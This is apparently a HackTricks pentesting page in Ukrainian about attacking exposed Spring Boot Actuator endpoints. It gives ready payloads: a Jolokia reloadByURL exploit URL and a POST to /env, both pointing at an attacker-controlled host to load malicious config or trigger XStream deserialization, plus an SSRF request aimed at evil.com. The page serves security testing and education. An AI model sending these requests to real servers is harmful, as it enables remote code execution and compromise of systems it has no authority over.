Spring Actuators

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Spring Auth Bypass

З https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Exploiting Spring Boot Actuators

Перевірте оригінальний пост за адресою [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Ключові моменти:

  • Актуатори Spring Boot реєструють ендпоінти, такі як /health, /trace, /beans, /env тощо. У версіях від 1 до 1.4 ці ендпоінти доступні без аутентифікації. Починаючи з версії 1.5, лише /health та /info за замовчуванням не є чутливими, але розробники часто вимикають цю безпеку.

  • Деякі ендпоінти Actuator можуть викривати чутливі дані або дозволяти шкідливі дії:

  • /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart та /heapdump.

  • У Spring Boot 1.x актуатори реєструються під кореневим URL, тоді як у 2.x вони розташовані під базовим шляхом /actuator/.

Техніки експлуатації:

  1. Віддалене виконання коду через '/jolokia':

  • Ендпоінт актуатора /jolokia викриває бібліотеку Jolokia, яка дозволяє HTTP-доступ до MBeans.

  • Дія reloadByURL може бути використана для перезавантаження конфігурацій логування зовнішнього URL, що може призвести до сліпого XXE або віддаленого виконання коду через створені XML-конфігурації.

  • Приклад URL-експлойту: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.

  1. Зміна конфігурації через '/env':

  • Якщо присутні бібліотеки Spring Cloud, ендпоінт /env дозволяє змінювати середовищні властивості.

  • Властивості можуть бути зманіпульовані для експлуатації вразливостей, таких як вразливість десеріалізації XStream у сервісі Eureka serviceURL.

  • Приклад POST-запиту експлойту:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
  1. Інші корисні налаштування:

  • Властивості, такі як spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url та spring.datasource.tomcat.max-active, можуть бути зманіпульовані для різних експлойтів, таких як SQL-ін'єкція або зміна рядків підключення до бази даних.

Додаткова інформація:

  • Повний список актуаторів за замовчуванням можна знайти тут.

  • Ендпоінт /env у Spring Boot 2.x використовує формат JSON для зміни властивостей, але загальна концепція залишається такою ж.

Пов'язані теми:

  1. Env + H2 RCE:

  • Деталі щодо експлуатації комбінації ендпоінту /env та бази даних H2 можна знайти тут.

  1. SSRF на Spring Boot через неправильне тлумачення шляху:

  • Обробка матричних параметрів (;) у HTTP-шляхах фреймворком Spring може бути експлуатована для Server-Side Request Forgery (SSRF).

  • Приклад запиту експлойту:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

Last updated